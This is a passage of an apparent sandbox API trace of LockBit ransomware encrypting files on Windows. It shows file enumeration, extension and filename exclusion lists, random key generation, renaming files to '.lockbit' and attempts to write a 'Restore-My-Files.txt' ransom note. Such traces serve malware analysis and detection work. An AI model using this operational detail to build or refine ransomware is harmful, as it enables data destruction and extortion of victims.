Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0167.259] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9bb8f800, ftCreationTime.dwHighDateTime=0x1bd4b1c, ftLastAccessTime.dwLowDateTime=0x6cd8b0b0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x9bb8f800, ftLastWriteTime.dwHighDateTime=0x1bd4b1c, nFileSizeHigh=0x0, nFileSizeLow=0x3100, dwReserved0=0x0, dwReserved1=0x0, cFileName="PE00934_.WMF", cAlternateFileName="")) returned 1 [0167.259] lstrcmpiW (lpString1=".", lpString2="PE00934_.WMF") returned -1 [0167.259] lstrcmpiW (lpString1="..", lpString2="PE00934_.WMF") returned -1 [0167.259] PathFindExtensionW (pszPath="PE00934_.WMF") returned=".WMF" [0167.259] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0167.259] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0167.260] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0167.260] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0167.260] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0167.260] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0167.260] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0167.260] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0167.260] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0167.260] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0167.260] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0167.260] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0167.260] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0167.260] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0167.260] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0167.260] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0167.260] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0167.260] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0167.260] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0167.260] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0167.260] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0167.260] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0167.260] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0167.260] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0167.260] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0167.260] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0167.260] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0167.260] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0167.260] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0167.260] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0167.261] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0167.261] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0167.261] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0167.261] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0167.261] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0167.261] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0167.261] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0167.261] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0167.261] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0167.261] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0167.261] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0167.261] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0167.261] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0167.261] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0167.261] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0167.261] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0167.261] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0167.261] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="PE00934_.WMF") returned 1 [0167.261] lstrcmpiW (lpString1="ntldr", lpString2="PE00934_.WMF") returned -1 [0167.261] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="PE00934_.WMF") returned -1 [0167.261] lstrcmpiW (lpString1="bootsect.bak", lpString2="PE00934_.WMF") returned -1 [0167.261] lstrcmpiW (lpString1="autorun.inf", lpString2="PE00934_.WMF") returned -1 [0167.261] lstrcmpiW (lpString1="thumbs.db", lpString2="PE00934_.WMF") returned 1 [0167.261] lstrcmpiW (lpString1="iconcache.db", lpString2="PE00934_.WMF") returned -1 [0167.261] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0167.261] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PE00934_.WMF") returned=".WMF" [0167.261] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0167.262] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0167.262] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0167.262] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0167.262] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0167.262] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0167.262] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0167.262] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0167.262] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0167.262] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0167.262] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0167.262] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0167.262] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0167.262] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0167.262] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0167.262] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0167.262] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0167.262] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0167.262] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0167.262] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0167.262] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0167.262] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0167.262] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0167.262] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0167.262] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0167.262] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0167.262] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0167.262] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0167.262] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PE00934_.WMF.lockbit") returned 72 [0167.263] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PE00934_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\pe00934_.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x3cc [0167.264] CreateIoCompletionPort (FileHandle=0x3cc, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0167.264] malloc (_Size=0x40068) returned 0x3df0008 [0167.264] GetFileSizeEx (in: hFile=0x3cc, lpFileSize=0x3df0020 | out: lpFileSize=0x3df0020*=12544) returned 1 [0167.264] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0167.264] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0167.264] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3003c) returned 0x0 [0167.265] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0167.265] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0167.265] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3004c) returned 0x0 [0167.265] ReadFile (in: hFile=0x3cc, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0167.270] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PE00934_.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PE00934_.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0167.270] malloc (_Size=0xa6) returned 0x1fa2ed8 [0167.270] NtSetInformationFile (FileHandle=0x3cc, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xa6, FileInformationClass=0xa) returned 0xc0000008 [0167.271] free (_Block=0x1fa2ed8) [0167.272] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PE00934_.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0167.272] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0167.272] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0167.272] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x24ca3200, ftCreationTime.dwHighDateTime=0x1bd4b11, ftLastAccessTime.dwLowDateTime=0x59cb4f50, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x24ca3200, ftLastWriteTime.dwHighDateTime=0x1bd4b11, nFileSizeHigh=0x0, nFileSizeLow=0x2904, dwReserved0=0x0, dwReserved1=0x0, cFileName="PE00998_.WMF", cAlternateFileName="")) returned 1 [0167.272] lstrcmpiW (lpString1=".", lpString2="PE00998_.WMF") returned -1 [0167.272] lstrcmpiW (lpString1="..", lpString2="PE00998_.WMF") returned -1 [0167.272] PathFindExtensionW (pszPath="PE00998_.WMF") returned=".WMF" [0167.272] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0167.272] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0167.272] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0167.272] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0167.272] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0167.272] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0167.272] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0167.272] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0167.272] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0167.272] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0167.272] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0167.272] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0167.272] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0167.272] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0167.272] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0167.272] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0167.272] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0167.273] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0167.273] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0167.273] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0167.273] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0167.273] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0167.273] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0167.273] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0167.273] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0167.273] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0167.273] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0167.273] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0167.273] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0167.273] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0167.273] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0167.273] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0167.273] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0167.273] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0167.273] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0167.273] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0167.273] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0167.273] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0167.273] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0167.273] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0167.273] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0167.273] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0167.273] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0167.273] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0167.274] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0167.274] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0167.274] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0167.274] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="PE00998_.WMF") returned 1 [0167.274] lstrcmpiW (lpString1="ntldr", lpString2="PE00998_.WMF") returned -1 [0167.274] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="PE00998_.WMF") returned -1 [0167.274] lstrcmpiW (lpString1="bootsect.bak", lpString2="PE00998_.WMF") returned -1 [0167.274] lstrcmpiW (lpString1="autorun.inf", lpString2="PE00998_.WMF") returned -1 [0167.274] lstrcmpiW (lpString1="thumbs.db", lpString2="PE00998_.WMF") returned 1 [0167.274] lstrcmpiW (lpString1="iconcache.db", lpString2="PE00998_.WMF") returned -1 [0167.274] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0167.274] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PE00998_.WMF") returned=".WMF" [0167.274] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0167.274] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0167.274] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0167.274] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0167.274] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0167.274] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0167.274] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0167.274] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0167.274] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0167.274] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0167.274] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0167.274] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0167.274] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0167.274] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0167.274] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0167.275] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0167.275] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0167.275] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0167.275] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0167.275] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0167.275] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0167.275] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0167.275] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0167.275] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0167.275] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0167.275] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0167.275] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0167.275] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0167.275] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PE00998_.WMF.lockbit") returned 72 [0167.275] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PE00998_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\pe00998_.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x3cc [0167.276] CreateIoCompletionPort (FileHandle=0x3cc, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0167.276] malloc (_Size=0x40068) returned 0x3df0008 [0167.276] GetFileSizeEx (in: hFile=0x3cc, lpFileSize=0x3df0020 | out: lpFileSize=0x3df0020*=10500) returned 1 [0167.276] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0167.277] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0167.277] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3003c) returned 0x0 [0167.277] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0167.277] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0167.277] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3004c) returned 0x0 [0167.277] ReadFile (in: hFile=0x3cc, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0167.283] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PE00998_.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PE00998_.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0167.283] malloc (_Size=0xa6) returned 0x1fa2ed8 [0167.283] NtSetInformationFile (FileHandle=0x3cc, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xa6, FileInformationClass=0xa) returned 0xc0000008 [0167.284] free (_Block=0x1fa2ed8) [0167.285] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PE00998_.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0167.285] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0167.285] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0167.285] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5c97c200, ftCreationTime.dwHighDateTime=0x1bf1118, ftLastAccessTime.dwLowDateTime=0x6cd8b0b0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x5c97c200, ftLastWriteTime.dwHighDateTime=0x1bf1118, nFileSizeHigh=0x0, nFileSizeLow=0x984, dwReserved0=0x0, dwReserved1=0x0, cFileName="PE01160_.WMF", cAlternateFileName="")) returned 1 [0167.285] lstrcmpiW (lpString1=".", lpString2="PE01160_.WMF") returned -1 [0167.285] lstrcmpiW (lpString1="..", lpString2="PE01160_.WMF") returned -1 [0167.285] PathFindExtensionW (pszPath="PE01160_.WMF") returned=".WMF" [0167.285] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0167.285] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0167.285] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0167.285] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0167.285] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0167.285] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0167.285] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0167.285] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0167.285] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0167.285] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0167.285] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0167.286] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0167.286] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0167.286] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0167.286] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0167.286] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0167.286] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0167.286] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0167.286] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0167.286] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0167.286] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0167.286] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0167.286] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0167.286] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0167.286] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0167.286] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0167.286] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0167.286] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0167.286] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0167.286] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0167.286] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0167.286] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0167.286] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0167.286] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0167.286] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0167.286] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0167.286] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0167.286] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0167.286] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0167.287] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0167.287] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0167.287] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0167.287] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0167.287] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0167.287] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0167.287] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0167.287] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0167.287] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="PE01160_.WMF") returned 1 [0167.287] lstrcmpiW (lpString1="ntldr", lpString2="PE01160_.WMF") returned -1 [0167.287] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="PE01160_.WMF") returned -1 [0167.287] lstrcmpiW (lpString1="bootsect.bak", lpString2="PE01160_.WMF") returned -1 [0167.287] lstrcmpiW (lpString1="autorun.inf", lpString2="PE01160_.WMF") returned -1 [0167.287] lstrcmpiW (lpString1="thumbs.db", lpString2="PE01160_.WMF") returned 1 [0167.287] lstrcmpiW (lpString1="iconcache.db", lpString2="PE01160_.WMF") returned -1 [0167.287] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0167.287] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PE01160_.WMF") returned=".WMF" [0167.287] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0167.287] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0167.287] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0167.287] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0167.287] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0167.287] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0167.287] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0167.287] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0167.287] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0167.287] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0167.288] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0167.288] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0167.288] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0167.288] lstrcmpiW 